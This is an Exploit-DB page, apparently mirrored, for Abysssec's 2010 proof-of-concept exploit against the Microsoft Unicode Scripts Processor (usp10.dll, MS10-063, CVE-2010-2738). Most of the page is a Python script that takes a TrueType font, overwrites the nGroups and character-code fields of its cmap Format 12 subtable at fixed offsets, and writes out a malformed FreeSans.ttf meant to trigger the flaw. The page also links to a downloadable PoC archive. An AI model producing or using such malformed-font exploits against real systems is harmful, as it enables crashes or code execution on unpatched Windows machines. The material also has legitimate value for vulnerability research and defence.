Microsoft Unicode Scripts Processor – Remote Code Execution (MS10-063)

• Exploit Database
• 17 阅读

• 作者： Abysssec
  日期： 2010-09-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15158/

• '''
   
  ________ __ ____
   |\/|/ __ \ /\| || |_ \ 
   | \/ | || | /\ | || | |_) |
   | |\/| | || |/ /\ \| || |_ <(Final Binary Analysis)
   | || | |__| / ____ \ |__| | |_) |
   |_||_|\____/_/\_\____/|____/ 
  
  '''
  
  '''
  Title : Microsoft Unicode Scripts Processor Remote Code Execution 
  Version : usp10.dll XP , Vista
  Analysis: http://www.abysssec.com
  Vendor: http://www.microsoft.com
  Impact: Critical
  Contact : shahin [at] abysssec.com , info[at] abysssec.com
  Twitter : @abysssec
  CVE : CVE-2010-2738
  MOAUB Number: MOAUB-FINAL
  
  http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15158.zip (moaub-30-PoC.zip)
  '''
  
  import sys
  import struct
  def main():
   
  try:
  				
  		fdR = open('src.ttf', 'rb+')
  		strTotal = fdR.read()
  		str1 = strTotal[:18316]
  		nGroups = '\x00\x00\x00\xDC'# nGroups field from Format 12 subtableof cmap table
  		startCharCode = '\x00\xE5\xF7\x20'# startCharCodefield from a Group Structure
  		endCharCode= '\x00\xE5\xF7\xFE' # endCharCodefield from a Group Structure
  		str2 = strTotal[18328:]
  		
  		fdW= open('FreeSans.ttf', 'wb+')
  		fdW.write(str1)
  		fdW.write(nGroups)
  		fdW.write(startCharCode)
  		fdW.write(endCharCode)
  		fdW.write(str2)
  		fdW.close()
  		fdR.close()
  		print '[-] Font file generated'
  except IOError:
  print '[*] Error : An IO error has occurred'
  print '[-] Exiting ...'
  sys.exit(-1)
  
  if __name__ == '__main__':
  main()